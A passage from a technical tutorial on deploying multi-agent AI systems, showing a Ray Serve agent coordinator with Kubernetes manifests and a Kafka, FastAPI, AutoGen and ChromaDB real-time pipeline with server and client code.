            groupchat=group_chat,
            llm_config={"config_list": self.config.get("llm_config_list")}
        )

        # Start the group discussion
        chat_result = user_proxy.initiate_chat(
            manager,
            message=f"Task for the group: {task}"
        )

        return {
            "task": task,
            "discussion": chat_result.chat_history,
            "summary": self._summarize_discussion(chat_result.chat_history)
        }

    def _extract_agent_result(self, chat_result):
        """Extract the key results from an agent conversation."""
        # Implementation would parse and structure agent outputs
        return "Extracted result summary"

    def _summarize_discussion(self, chat_history):
        """Summarize the outcome of a group discussion."""
        # Implementation would create a concise summary
        return "Discussion summary"

# Deploy the agent coordinator service.
# Note: serving create_agent_team / execute_agent_workflow over HTTP also
# requires a __call__ handler or a FastAPI ingress on the class (not shown).
agent_coordinator_deployment = AgentCoordinator.bind("config/agent_config.json")
serve.run(
    agent_coordinator_deployment,
    name="agent-coordinator",
    route_prefix="/agent-coordinator"
)

print("Agent Coordinator service deployed and ready")

Client Implementation:

python
# client.py
import asyncio
import json

import requests

# The client talks to Ray Serve over HTTP only, so it does not need its own
# connection to the Ray cluster

async def run_distributed_agent_task():
    # Define the team structure for a specific task
    team_spec = {
        "manager": {
            "knowledge_base": "corporate_policies"
        },
        "analyst": {
            "knowledge_base": "financial_data"
        },
        "engineer": {
            "knowledge_base": "technical_specs"
        },
        "compliance": {
            "knowledge_base": "regulations"
        }
    }

    # Define the task
    task_description = """
    Analyze our Q4 financial performance and recommend infrastructure
    improvements that would optimize cost efficiency while maintaining
    compliance with our industry regulations.
    """

    # Send request to create the agent team
    response = requests.post(
        "http://localhost:8000/agent-coordinator/create_agent_team",
        json={
            "task_description": task_description,
            "team_spec": team_spec
        }
    )
    response.raise_for_status()  # Fail fast on HTTP errors

    team_data = response.json()

    # Execute the workflow with the created team
    workflow_response = requests.post(
        "http://localhost:8000/agent-coordinator/execute_agent_workflow",
        json={
            "team_data": team_data,
            "workflow_type": "groupchat"
        }
    )
    workflow_response.raise_for_status()

    results = workflow_response.json()

    # Process and display the results
    print(f"Task Results: {json.dumps(results, indent=2)}")

    return results

if __name__ == "__main__":
    asyncio.run(run_distributed_agent_task())

Key Advantages:

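  1. Elastic Scaling: With autoscaling configured (for example, the KubeRay autoscaler together with a Kubernetes cluster autoscaler), worker capacity grows and shrinks with demand
  2. Resource Efficiency: Ray schedules tasks and actors onto nodes according to their declared CPU, GPU, and memory requirements
  3. Fault Tolerance: Ray retries tasks lost to worker or node failures by default and can restart failed actors when max_restarts is set
  4. Distributed State: Ray actors hold per-agent state, and the object store shares immutable results between nodes
  5. High Performance: Ray actors call each other directly, with no intermediate message broker adding latency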

Production Considerations:

  1. Observability: Implement detailed logging and monitoring:
python
# Structured logging for distributed agents
import time

import structlog
import ray

# Configure structured logger
structlog.configure(
    processors=[
        structlog.processors.TimeStamper(fmt="iso"),
        structlog.processors.JSONRenderer()
    ]
)

# Create logger instance
logger = structlog.get_logger()

# Example instrumented agent class
@ray.remote
class InstrumentedAgent:
    def __init__(self, agent_id, role):
        self.agent_id = agent_id
        self.role = role
        self.logger = logger.bind(
            component="agent",
            agent_id=agent_id,
            role=role
        )
        self.metrics = {
            "tasks_completed": 0,
            "tokens_consumed": 0,
            "average_response_time": 0,
            "errors": 0
        }

    def process_task(self, task_data):
        start_time = time.time()

        # Log task initiation
        self.logger.info(
            "task_started",
            task_id=task_data.get("id"),
            task_type=task_data.get("type")
        )

        try:
            # Task processing logic would go here
            result = self._execute_agent_task(task_data)

            # Update metrics (the average is maintained as a running mean)
            elapsed = time.time() - start_time
            self.metrics["tasks_completed"] += 1
            self.metrics["tokens_consumed"] += result.get("tokens_used", 0)
            self.metrics["average_response_time"] = (
                (self.metrics["average_response_time"] * (self.metrics["tasks_completed"] - 1) + elapsed)
                / self.metrics["tasks_completed"]
            )

            # Log successful completion
            self.logger.info(
                "task_completed",
                task_id=task_data.get("id"),
                duration=elapsed,
                tokens_used=result.get("tokens_used", 0)
            )

            return result

        except Exception as e:
            # Update error metrics
            self.metrics["errors"] += 1

            # Log error with details
            self.logger.error(
                "task_failed",
                task_id=task_data.get("id"),
                error=str(e),
                duration=time.time() - start_time,
                exception_type=type(e).__name__
            )

            # Re-raise so the caller sees the failure
            raise

    def get_metrics(self):
        """Return current agent metrics."""
        return {
            **self.metrics,
            "agent_id": self.agent_id,
            "role": self.role,
            "timestamp": time.time()
        }

    def _execute_agent_task(self, task_data):
        # Actual implementation would go here
        return {"status": "success", "tokens_used": 150}
  2. Security: Configure proper isolation and permissions:
yaml
# security-context.yaml
apiVersion: v1
kind: ServiceAccount
metadata:
  name: agent-service-account
  namespace: ai-agents
---
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  namespace: ai-agents
  name: agent-role
rules:
- apiGroups: [""]
  resources: ["pods", "pods/log"]
  verbs: ["get", "list", "watch"]
- apiGroups: [""]
  resources: ["configmaps"]
  verbs: ["get", "list"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: agent-role-binding
  namespace: ai-agents
subjects:
- kind: ServiceAccount
  name: agent-service-account
  namespace: ai-agents
roleRef:
  kind: Role
  name: agent-role
  apiGroup: rbac.authorization.k8s.io
  3. API Key Management: Use Kubernetes secrets for secure credential management:
yaml
# agent-secrets.yaml
apiVersion: v1
kind: Secret
metadata:
  name: agent-api-keys
  namespace: ai-agents
type: Opaque
data:
  # Values under `data` must be base64-encoded; these are placeholders
  openai-api-key: base64encodedkey
  pinecone-api-key: base64encodedkey
  4. Persistent Storage: Configure persistent volumes for agent data:
yaml
# agent-storage.yaml
apiVersion: v1
kind: PersistentVolumeClaim
metadata:
  name: agent-data-pvc
  namespace: ai-agents
spec:
  accessModes:
    - ReadWriteOnce
  resources:
    requests:
      storage: 10Gi
  storageClassName: standard
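
The `data` field of the Secret manifest (`agent-secrets.yaml`) expects base64-encoded values rather than raw keys. A minimal sketch of producing them with Python's standard library follows; the helper name `encode_secret_values` and the sample key strings are illustrative assumptions, not part of the original setup.

```python
import base64


def encode_secret_values(raw: dict[str, str]) -> dict[str, str]:
    """Base64-encode each value, as the `data` field of a Secret requires."""
    return {
        name: base64.b64encode(value.encode("utf-8")).decode("ascii")
        for name, value in raw.items()
    }


if __name__ == "__main__":
    # Placeholder values for illustration only; never commit real keys.
    encoded = encode_secret_values({
        "openai-api-key": "sk-example",
        "pinecone-api-key": "pc-example",
    })
    for name, value in encoded.items():
        print(f"  {name}: {value}")
```

Base64 is an encoding, not encryption, so access to the Secret still needs to be restricted through RBAC. Kubernetes also accepts a `stringData` field with plain-text values, which avoids the manual encoding step.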

This stack is particularly well-suited for organizations that need to:

  • Process large volumes of data with AI agents
  • Run complex simulations or forecasting models
  • Support high-throughput API services backed by AI agents
  • Dynamically allocate computing resources based on demand

Apache Kafka + FastAPI + AutoGen + ChromaDB (Real-Time AI Pipelines)

This stack is optimized for event-driven, real-time AI agent systems that need to process streaming data and respond to events as they occur. It's ideal for applications like fraud detection, real-time monitoring, and event-based workflow automation.

Architecture Overview:

Kafka + FastAPI + AutoGen Architecture

The architecture consists of:

  1. Apache Kafka: Event streaming platform for high-throughput message processing
  2. FastAPI: High-performance API framework for agent endpoints and services
  3. AutoGen: Multi-agent orchestration framework
  4. ChromaDB: Vector database for efficient knowledge retrieval
  5. Redis: Cache for agent state and session management
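
To make the data flow between these components concrete, here is a minimal in-process sketch. It is a simplification under stated assumptions: an `asyncio.Queue` stands in for the Kafka request topic, a plain dictionary stands in for Redis, the separate response topic is folded into the worker, and `fake_agent` is a hypothetical placeholder for an AutoGen call. No real Kafka, Redis, or AutoGen APIs are used.

```python
import asyncio
import uuid


async def fake_agent(query: str) -> str:
    """Hypothetical placeholder for an AutoGen agent call."""
    await asyncio.sleep(0)  # yield control, as a real LLM call would
    return f"answer to: {query}"


class InProcessPipeline:
    """API -> request topic -> worker -> status store, all in one process."""

    def __init__(self) -> None:
        self.requests: asyncio.Queue = asyncio.Queue()  # stands in for a Kafka topic
        self.status: dict[str, dict] = {}               # stands in for Redis hashes

    async def submit(self, query: str) -> str:
        """What the API endpoint does: record 'pending', publish, return an id."""
        request_id = str(uuid.uuid4())
        self.status[request_id] = {"status": "pending"}
        await self.requests.put({"request_id": request_id, "query": query})
        return request_id

    async def worker(self) -> None:
        """What the agent worker does: consume, run the agent, store the result."""
        while True:
            msg = await self.requests.get()
            rid = msg["request_id"]
            self.status[rid] = {"status": "processing"}
            try:
                answer = await fake_agent(msg["query"])
                self.status[rid] = {"status": "completed", "response": answer}
            except Exception as exc:
                self.status[rid] = {"status": "error", "error": str(exc)}
            finally:
                self.requests.task_done()


async def demo() -> dict:
    pipeline = InProcessPipeline()
    worker_task = asyncio.create_task(pipeline.worker())
    rid = await pipeline.submit("What changed in Q4?")
    await pipeline.requests.join()  # wait until the worker has handled the request
    worker_task.cancel()
    await asyncio.gather(worker_task, return_exceptions=True)
    return pipeline.status[rid]


if __name__ == "__main__":
    print(asyncio.run(demo()))
```

The point of the sketch is the shape of the flow: the submitting side returns immediately with a request id, and the result appears later in the status store, which is what allows the API and the workers to scale separately.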

Implementation Example:

First, let's set up our environment with Docker Compose:

yaml
# docker-compose.yml
version: '3'

services:
  zookeeper:
    image: confluentinc/cp-zookeeper:7.3.0
    environment:
      ZOOKEEPER_CLIENT_PORT: 2181
    healthcheck:
      test: ["CMD", "nc", "-z", "localhost", "2181"]
      interval: 10s
      timeout: 5s
      retries: 5

  kafka:
    image: confluentinc/cp-kafka:7.3.0
    depends_on:
      zookeeper:
        condition: service_healthy
    ports:
      - "9092:9092"
    environment:
      KAFKA_BROKER_ID: 1
      KAFKA_ZOOKEEPER_CONNECT: zookeeper:2181
      KAFKA_ADVERTISED_LISTENERS: PLAINTEXT://kafka:29092,PLAINTEXT_HOST://localhost:9092
      KAFKA_LISTENER_SECURITY_PROTOCOL_MAP: PLAINTEXT:PLAINTEXT,PLAINTEXT_HOST:PLAINTEXT
      KAFKA_INTER_BROKER_LISTENER_NAME: PLAINTEXT
      KAFKA_OFFSETS_TOPIC_REPLICATION_FACTOR: 1
      KAFKA_TRANSACTION_STATE_LOG_REPLICATION_FACTOR: 1
    healthcheck:
      test: ["CMD", "kafka-topics", "--bootstrap-server", "localhost:9092", "--list"]
      interval: 10s
      timeout: 5s
      retries: 5

  redis:
    image: redis:7.0-alpine
    ports:
      - "6379:6379"
    healthcheck:
      test: ["CMD", "redis-cli", "ping"]
      interval: 5s
      timeout: 3s
      retries: 5

  chromadb:
    image: ghcr.io/chroma-core/chroma:0.4.15
    ports:
      - "8000:8000"
    volumes:
      - chroma-data:/chroma/chroma
    environment:
      # Chroma 0.4.x rejects the legacy CHROMA_DB_IMPL=duckdb+parquet setting;
      # persistence is enabled with IS_PERSISTENT and PERSIST_DIRECTORY instead.
      - IS_PERSISTENT=TRUE
      - PERSIST_DIRECTORY=/chroma/chroma

  agent-service:
    build:
      context: .
      dockerfile: Dockerfile.agent
    depends_on:
      kafka:
        condition: service_healthy
      redis:
        condition: service_healthy
      chromadb:
        condition: service_started
    ports:
      - "8080:8080"
    volumes:
      - ./app:/app
      - ./data:/data
    environment:
      - KAFKA_BOOTSTRAP_SERVERS=kafka:29092
      - REDIS_HOST=redis
      - REDIS_PORT=6379
      - CHROMA_HOST=chromadb
      - CHROMA_PORT=8000
      - OPENAI_API_KEY=${OPENAI_API_KEY}
    command: uvicorn app.main:app --host 0.0.0.0 --port 8080 --reload

volumes:
  chroma-data:

Next, let's build our FastAPI application:

python
# app/main.py
import os
import json
import asyncio
import uuid
from datetime import datetime
from typing import Dict, List, Optional, Any

import redis
import autogen
import chromadb
from chromadb.utils import embedding_functions
from fastapi import FastAPI, BackgroundTasks, HTTPException, Depends
from fastapi.middleware.cors import CORSMiddleware
from pydantic import BaseModel, Field
from aiokafka import AIOKafkaProducer, AIOKafkaConsumer
from contextlib import asynccontextmanager

# Models for API requests and responses
class AgentRequest(BaseModel):
    query: str
    user_id: str
    context: Optional[Dict[str, Any]] = None
    agent_type: str = "general"
    priority: str = "normal"

class AgentResponse(BaseModel):
    request_id: str
    status: str
    message: str
    data: Optional[Dict[str, Any]] = None
    timestamp: str = Field(default_factory=lambda: datetime.now().isoformat())

class EventData(BaseModel):
    event_type: str
    payload: Dict[str, Any]
    timestamp: str = Field(default_factory=lambda: datetime.now().isoformat())

# Configure Redis client
redis_client = redis.Redis(
    host=os.environ.get("REDIS_HOST", "localhost"),
    port=int(os.environ.get("REDIS_PORT", 6379)),
    decode_responses=True
)

# Configure ChromaDB client
chroma_client = chromadb.HttpClient(
    host=os.environ.get("CHROMA_HOST", "localhost"),
    port=int(os.environ.get("CHROMA_PORT", 8000))
)

# Configure embedding function
openai_ef = embedding_functions.OpenAIEmbeddingFunction(
    api_key=os.environ.get("OPENAI_API_KEY"),
    model_name="text-embedding-ada-002"
)

# Ensure the collection exists: created on first run, reused afterwards.
# This replaces a bare `except:` around get_collection, which would also
# have hidden unrelated errors such as connection failures.
knowledge_collection = chroma_client.get_or_create_collection(
    name="agent_knowledge",
    embedding_function=openai_ef
)

# Kafka configuration
KAFKA_BOOTSTRAP_SERVERS = os.environ.get("KAFKA_BOOTSTRAP_SERVERS", "localhost:9092")
AGENT_REQUEST_TOPIC = "agent_requests"
AGENT_RESPONSE_TOPIC = "agent_responses"
EVENT_TOPIC = "system_events"

# Kafka producer, created during application startup
producer = None

# Lifespan manager for FastAPI to handle async setup/teardown
@asynccontextmanager
async def lifespan(app: FastAPI):
    # Setup: create global producer
    global producer
    producer = AIOKafkaProducer(
        bootstrap_servers=KAFKA_BOOTSTRAP_SERVERS,
        value_serializer=lambda v: json.dumps(v).encode('utf-8'),
        acks='all',
        # aiokafka has no `retries` option; it retries retriable errors
        # itself until request_timeout_ms elapses.
        enable_idempotence=True
    )

    # Start the producer
    await producer.start()

    # Start the consumers and the agent worker. They have to be started here:
    # FastAPI skips @app.on_event("startup") hooks when a lifespan is supplied.
    background_tasks = [
        asyncio.create_task(consume_agent_responses()),
        asyncio.create_task(consume_events()),
        asyncio.create_task(agent_worker()),
    ]

    # Yield control back to FastAPI
    yield

    # Cleanup: cancel the background tasks, then close the producer
    for task in background_tasks:
        task.cancel()
    await asyncio.gather(*background_tasks, return_exceptions=True)

    await producer.stop()

# Initialize FastAPI
app = FastAPI(lifespan=lifespan)

# Configure CORS (wide open here; restrict allow_origins in production)
app.add_middleware(
    CORSMiddleware,
    allow_origins=["*"],
    allow_credentials=True,
    allow_methods=["*"],
    allow_headers=["*"],
)

# Agent factory for creating different agent types
class AgentFactory:
    @staticmethod
    def create_agent(agent_type, context=None):
        llm_config = {
            "config_list": [
                {
                    "model": "gpt-4",
                    "api_key": os.environ.get("OPENAI_API_KEY")
                }
            ],
            "temperature": 0.5,
            "timeout": 120,
            "cache_seed": None  # Disable caching for real-time applications
        }

        if agent_type == "analyst":
            system_message = """You are a financial analyst agent specialized in market trends
            and investment strategies. Analyze data precisely and provide actionable insights."""

            # Add specific functions for analyst
            llm_config["functions"] = [
                {
                    "name": "analyze_market_data",
                    "description": "Analyze market data to identify trends and opportunities",
                    "parameters": {
                        "type": "object",
                        "properties": {
                            "sector": {"type": "string", "description": "Market sector to analyze"},
                            "timeframe": {"type": "string", "description": "Timeframe for analysis (e.g., '1d', '1w', '1m')"},
                            "metrics": {"type": "array", "items": {"type": "string"}, "description": "Metrics to include in analysis"}
                        },
                        "required": ["sector", "timeframe"]
                    }
                }
            ]

        elif agent_type == "support":
            system_message = """You are a customer support agent that helps users with
            technical issues and product questions. Be empathetic and solution-oriented."""

        else:  # default general agent
            system_message = """You are a helpful AI assistant that provides accurate and
            concise information on a wide range of topics."""

        # Create the agent
        agent = autogen.AssistantAgent(
            name=f"{agent_type.capitalize()}Agent",
            system_message=system_message,
            llm_config=llm_config
        )

        return agent

# Function to retrieve relevant knowledge for agent context
async def retrieve_knowledge(query, filters=None, limit=5):
    try:
        results = knowledge_collection.query(
            query_texts=[query],
            n_results=limit,
            where=filters
        )

        if results and len(results['documents']) > 0:
            documents = results['documents'][0]
            metadatas = results['metadatas'][0] if 'metadatas' in results else [{}] * len(documents)
            distances = results['distances'][0] if 'distances' in results else [1.0] * len(documents)

            return [
                {
                    "content": doc,
                    "metadata": meta,
                    "relevance": 1 - dist if dist <= 1 else 0
                }
                for doc, meta, dist in zip(documents, metadatas, distances)
            ]
        return []
    except Exception as e:
        print(f"Error retrieving knowledge: {e}")
        return []

# Background task to process agent request through Kafka
async def process_agent_request(request_id: str, request: AgentRequest):
    try:
        # Publish request to Kafka
        await producer.send_and_wait(
            AGENT_REQUEST_TOPIC,
            {
                "request_id": request_id,
                "query": request.query,
                "user_id": request.user_id,
                "context": request.context,
                "agent_type": request.agent_type,
                "priority": request.priority,
                "timestamp": datetime.now().isoformat()
            }
        )

        # Update request status in Redis
        redis_client.hset(
            f"request:{request_id}",
            mapping={
                "status": "processing",
                "timestamp": datetime.now().isoformat()
            }
        )
        redis_client.expire(f"request:{request_id}", 3600)  # Expire after 1 hour

        # Publish event
        await producer.send_and_wait(
            EVENT_TOPIC,
            {
                "event_type": "agent_request_received",
                "payload": {
                    "request_id": request_id,
                    "user_id": request.user_id,
                    "agent_type": request.agent_type,
                    "priority": request.priority
                },
                "timestamp": datetime.now().isoformat()
            }
        )

    except Exception as e:
        # Update request status in Redis
        redis_client.hset(
            f"request:{request_id}",
            mapping={
                "status": "error",
                "error": str(e),
                "timestamp": datetime.now().isoformat()
            }
        )
        redis_client.expire(f"request:{request_id}", 3600)  # Expire after 1 hour

        # Publish error event
        await producer.send_and_wait(
            EVENT_TOPIC,
            {
                "event_type": "agent_request_error",
                "payload": {
                    "request_id": request_id,
                    "error": str(e)
                },
                "timestamp": datetime.now().isoformat()
            }
        )

# Consumer for agent responses
async def consume_agent_responses():
    consumer = AIOKafkaConsumer(
        AGENT_RESPONSE_TOPIC,
        bootstrap_servers=KAFKA_BOOTSTRAP_SERVERS,
        group_id="agent-service-group",
        value_deserializer=lambda m: json.loads(m.decode('utf-8')),
        auto_offset_reset="latest",
        enable_auto_commit=True
    )

    await consumer.start()

    try:
        async for message in consumer:
            response_data = message.value
            request_id = response_data.get("request_id")

            if request_id:
                # Update response in Redis
                redis_client.hset(
                    f"request:{request_id}",
                    mapping={
                        "status": "completed",
                        "response": json.dumps(response_data),
                        "completed_at": datetime.now().isoformat()
                    }
                )

                # Publish completion event
                await producer.send(
                    EVENT_TOPIC,
                    {
                        "event_type": "agent_response_completed",
                        "payload": {
                            "request_id": request_id,
                            "processing_time": response_data.get("processing_time")
                        },
                        "timestamp": datetime.now().isoformat()
                    }
                )
    finally:
        await consumer.stop()

# Consumer for system events
async def consume_events():
    consumer = AIOKafkaConsumer(
        EVENT_TOPIC,
        bootstrap_servers=KAFKA_BOOTSTRAP_SERVERS,
        group_id="event-processor-group",
        value_deserializer=lambda m: json.loads(m.decode('utf-8')),
        auto_offset_reset="latest",
        enable_auto_commit=True
    )

    await consumer.start()

    try:
        async for message in consumer:
            event_data = message.value
            event_type = event_data.get("event_type")

            # Process different event types
            if event_type == "agent_request_received":
                # Metrics tracking
                pass
            elif event_type == "agent_response_completed":
                # Performance monitoring
                pass
            elif event_type == "agent_request_error":
                # Error handling and alerting
                pass
    finally:
        await consumer.stop()

# Worker process that handles agent requests from Kafka
async def agent_worker():
    consumer = AIOKafkaConsumer(
        AGENT_REQUEST_TOPIC,
        bootstrap_servers=KAFKA_BOOTSTRAP_SERVERS,
        group_id="agent-worker-group",
        value_deserializer=lambda m: json.loads(m.decode('utf-8')),
        auto_offset_reset="earliest",
        enable_auto_commit=True
    )

    await consumer.start()

    try:
        async for message in consumer:
            request_data = message.value
            request_id = request_data.get("request_id")

            start_time = datetime.now()

            try:
                # Create appropriate agent type
                agent = AgentFactory.create_agent(
                    request_data.get("agent_type", "general"),
                    context=request_data.get("context")
                )

                # Retrieve relevant knowledge, filtering by domain only when one is given
                domain = (request_data.get("context") or {}).get("domain")
                knowledge = await retrieve_knowledge(
                    request_data.get("query"),
                    filters={"domain": domain} if domain else None
                )

                # Create user proxy agent for handling the conversation.
                # It never replies, so code execution is disabled.
                user_proxy = autogen.UserProxyAgent(
                    name="User",
                    human_input_mode="NEVER",
                    max_consecutive_auto_reply=0,
                    code_execution_config=False
                )

                # Build the prompt with knowledge context
                knowledge_context = ""
                if knowledge:
                    knowledge_context = "\n\nRelevant context:\n"
                    for i, item in enumerate(knowledge, 1):
                        knowledge_context += f"{i}. {item['content']}\n"

                query = request_data.get("query")
                message = f"{query}\n{knowledge_context}"

                # Start conversation with agent. initiate_chat blocks, so run it
                # in a worker thread to keep the event loop responsive.
                await asyncio.to_thread(user_proxy.initiate_chat, agent, message=message)

                # Extract agent response. The proxy sends only the opening message,
                # so the last message exchanged with the agent is the agent's reply.
                last_message = user_proxy.last_message(agent)
                response_content = (last_message or {}).get("content") or ""

                processing_time = (datetime.now() - start_time).total_seconds()

                # Send response back through Kafka
                await producer.send_and_wait(
                    AGENT_RESPONSE_TOPIC,
                    {
                        "request_id": request_id,
                        "status": "success",
                        "response": response_content,
                        "processing_time": processing_time,
                        "timestamp": datetime.now().isoformat()
                    }
                )

            except Exception as e:
                processing_time = (datetime.now() - start_time).total_seconds()

                # Send error response
                await producer.send_and_wait(
                    AGENT_RESPONSE_TOPIC,
                    {
                        "request_id": request_id,
                        "status": "error",
                        "error": str(e),
                        "processing_time": processing_time,
                        "timestamp": datetime.now().isoformat()
                    }
                )
    finally:
        await consumer.stop()

# Routes
@app.post("/api/agent/request", response_model=AgentResponse)
async def create_agent_request(request: AgentRequest, background_tasks: BackgroundTasks):
    request_id = str(uuid.uuid4())

    # Store initial request in Redis
    redis_client.hset(
        f"request:{request_id}",
        mapping={
            "user_id": request.user_id,
            "query": request.query,
            "agent_type": request.agent_type,
            "status": "pending",
            "timestamp": datetime.now().isoformat()
        }
    )
    redis_client.expire(f"request:{request_id}", 3600)  # Expire after 1 hour

    # Process request asynchronously
    background_tasks.add_task(process_agent_request, request_id, request)

    return AgentResponse(
        request_id=request_id,
        status="pending",
        message="Request has been submitted for processing"
    )

@app.get("/api/agent/status/{request_id}", response_model=AgentResponse)
async def get_agent_status(request_id: str):
    # Check if request exists in Redis
    request_data = redis_client.hgetall(f"request:{request_id}")

    if not request_data:
        raise HTTPException(status_code=404, detail="Request not found")

    status = request_data.get("status", "unknown")

    if status == "completed":
        # Return the completed response
        response_data = json.loads(request_data.get("response", "{}"))
        return AgentResponse(
            request_id=request_id,
            status=status,
            message="Request completed",
            data=response_data
        )
    elif status == "error":
        # Return error details
        return AgentResponse(
            request_id=request_id,
            status=status,
            message=f"Error processing request: {request_data.get('error', 'Unknown error')}",
        )
    else:
        # Return current status
        return AgentResponse(
            request_id=request_id,
            status=status,
            message=f"Request is currently {status}"
        )

@app.post("/api/events/publish", status_code=202)
async def publish_event(event: EventData):
    try:
        await producer.send_and_wait(
            EVENT_TOPIC,
            event.dict()
        )
        return {"status": "success", "message": "Event published successfully"}
    except Exception as e:
        raise HTTPException(status_code=500, detail=f"Failed to publish event: {str(e)}")

@app.post("/api/knowledge/add")
async def add_knowledge(items: List[Dict[str, Any]]):
    try:
        documents = [item["content"] for item in items]
        metadata = [item.get("metadata", {}) for item in items]
        ids = [f"doc_{uuid.uuid4()}" for _ in items]

        knowledge_collection.add(
            documents=documents,
            metadatas=metadata,
            ids=ids
        )

        return {"status": "success", "message": f"Added {len(documents)} items to knowledge base"}
    except Exception as e:
        raise HTTPException(status_code=500, detail=f"Failed to add knowledge: {str(e)}")

@app.get("/api/knowledge/search")
async def search_knowledge(query: str, limit: int = 5):
    knowledge = await retrieve_knowledge(query, limit=limit)
    return {"results": knowledge}

# agent_worker() must be launched from the lifespan handler rather than from an
# @app.on_event("startup") hook: FastAPI ignores on_event hooks once a lifespan
# is passed to FastAPI().

if __name__ == "__main__":
    import uvicorn
    uvicorn.run("main:app", host="0.0.0.0", port=8080, reload=True)
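
`retrieve_knowledge` converts a distance into a relevance score with `1 - dist`, clamped at zero for distances above 1. Whether that score is meaningful depends on the collection's distance metric. As a hedged illustration, assume unit-length embeddings and a squared-L2 metric (both are assumptions about the deployment; the code above does not configure a metric explicitly). In that case the squared distance d and the cosine similarity are related by d = 2 - 2·cos, so d ranges from 0 to 4 and a score in [0, 1] can be recovered as shown. All function names here are hypothetical.

```python
import math


def normalize(vector: list[float]) -> list[float]:
    """Scale a vector to unit length."""
    norm = math.sqrt(sum(x * x for x in vector))
    return [x / norm for x in vector]


def squared_l2(a: list[float], b: list[float]) -> float:
    """Squared Euclidean distance between two vectors."""
    return sum((x - y) ** 2 for x, y in zip(a, b))


def relevance_from_squared_l2(distance: float) -> float:
    """Map a squared-L2 distance between unit vectors to a score in [0, 1].

    For unit vectors, cosine = 1 - distance / 2, which lies in [-1, 1].
    Rescaling with (cosine + 1) / 2 gives 1.0 for identical vectors,
    0.5 for orthogonal ones, and 0.0 for opposite ones.
    """
    cosine = 1.0 - distance / 2.0
    return max(0.0, min(1.0, (cosine + 1.0) / 2.0))


if __name__ == "__main__":
    query = normalize([3.0, 4.0])
    for label, doc in [("same", [3.0, 4.0]), ("orthogonal", [-4.0, 3.0]), ("opposite", [-3.0, -4.0])]:
        d = squared_l2(query, normalize(doc))
        print(label, round(d, 3), round(relevance_from_squared_l2(d), 3))
```

Under these assumptions, the original `1 - dist` rule would score every document with cosine similarity below 0.5 as zero, so it is worth checking which metric the collection actually uses before interpreting the `relevance` field.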

Client Implementation Example:

python
# client.py
import asyncio
import json
import time
from typing import Dict, List, Any, Optional

import aiohttp

class AgentClient:
    def __init__(self, base_url: str = "http://localhost:8080"):
        self.base_url = base_url
        self.session = None

    async def __aenter__(self):
        self.session = aiohttp.ClientSession()
        return self

    async def __aexit__(self, exc_type, exc_val, exc_tb):
        if self.session:
            await self.session.close()

    async def submit_request(self, query: str, user_id: str,
                             agent_type: str = "general",
                             context: Optional[Dict[str, Any]] = None,
                             priority: str = "normal") -> Dict[str, Any]:
        """Submit a request to the agent service."""
        if self.session is None:
            self.session = aiohttp.ClientSession()

        payload = {
            "query": query,
            "user_id": user_id,
            "agent_type": agent_type,
            "priority": priority
        }

        if context:
            payload["context"] = context

        async with self.session.post(
            f"{self.base_url}/api/agent/request",
            json=payload
        ) as response:
            if response.status == 200:
                return await response.json()
            else:
                error_text = await response.text()
                raise Exception(f"Error submitting request: {error_text}")

    async def get_request_status(self, request_id: str) -> Dict[str, Any]:
        """Get the status of a request."""
        if self.session is None:
            self.session = aiohttp.ClientSession()

        async with self.session.get(
            f"{self.base_url}/api/agent/status/{request_id}"
        ) as response:
            if response.status == 200:
                return await response.json()
            else:
                error_text = await response.text()
                raise Exception(f"Error getting status: {error_text}")

    async def wait_for_completion(self, request_id: str,
                                  polling_interval: float = 1.0,
                                  timeout: float = 120.0) -> Dict[str, Any]:
        """Wait for a request to complete, with timeout."""
        start_time = time.time()

        while (time.time() - start_time) < timeout:
            status_response = await self.get_request_status(request_id)

            if status_response["status"] in ["completed", "error"]:
                return status_response

            await asyncio.sleep(polling_interval)

        raise TimeoutError(f"Request {request_id} did not complete within {timeout} seconds")

    async def add_knowledge(self, items: List[Dict[str, Any]]) -> Dict[str, Any]:
        """Add knowledge items to the agent knowledge base."""
        if self.session is None:
            self.session = aiohttp.ClientSession()

        async with self.session.post(
            f"{self.base_url}/api/knowledge/add",
            json=items
        ) as response:
            if response.status == 200:
                return await response.json()
            else:
                error_text = await response.text()
                raise Exception(f"Error adding knowledge: {error_text}")

    async def search_knowledge(self, query: str, limit: int = 5) -> Dict[str, Any]:
        """Search the knowledge base."""
        if self.session is None:
            self.session = aiohttp.ClientSession()

        async with self.session.get(
            f"{self.base_url}/api/knowledge/search",
            params={"query": query, "limit": limit}
        ) as response:
            if response.status == 200:
                return await response.json()
            else:
                error_text = await response.text()
                raise Exception(f"Error searching knowledge: {error_text}")

async def main():
    # Example client usage
    async with AgentClient() as client:
        # Add knowledge first
        knowledge_items = [
            {
                "content": "Apple Inc. reported Q4 2023 earnings of $1.46 per share, exceeding analyst expectations of $1.39 per share.",
                "metadata": {
                    "domain": "finance",
                    "category": "earnings",
                    "company": "Apple",
                    "date": "2023-10-27"
                }
            },
            {
                "content": "The S&P 500 closed at 4,738.15 on January 12, 2024, up 1.2% for the day.",
                "metadata": {
                    "domain": "finance",
                    "category": "market_data",
                    "index": "S&P 500",
                    "date": "2024-01-12"
                }
            }
        ]

        knowledge_result = await client.add_knowledge(knowledge_items)
        print(f"Knowledge add result: {json.dumps(knowledge_result, indent=2)}")

        # Submit a request to the analyst agent
        request_result = await client.submit_request(
            query="What was Apple's performance in their most recent earnings report?",
            user_id="test-user-123",
            agent_type="analyst",
            context={
                "domain": "finance",
                "analysis_type": "earnings"
            }
        )

        print(f"Request submitted: {json.dumps(request_result, indent=2)}")
        request_id = request_result["request_id"]

        # Wait for completion
        try:
            completion_result = await client.wait_for_completion(
                request_id,
                polling_interval=2.0,
                timeout=60.0
            )

            print(f"Request completed: {json.dumps(completion_result, indent=2)}")

        except TimeoutError as e:
            print(f"Request timed out: {e}")

if __name__ == "__main__":
    asyncio.run(main())

Key Advantages:

  1. Real-Time Processing: Stream processing via Kafka lets agents react to events shortly after they arrive
  2. Decoupling: Producers and consumers communicate only through topics, so either side can fail or restart without taking down the other
  3. Scalability: API servers, workers, and brokers scale independently based on demand
  4. Event Sourcing: Interactions are recorded as events, so they can be replayed and audited within each topic's retention window
  5. Statelessness: API services keep request state in Redis rather than in process memory, which simplifies scaling and deployment
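
The decoupling and replay properties listed above both follow from Kafka's log model: records are appended to a log, and each consumer group tracks its own read position. A toy in-memory version illustrates the idea. The names `EventLog`, `poll`, and `seek` are hypothetical and only loosely mirror Kafka concepts; this is not the Kafka client API.

```python
from collections import defaultdict
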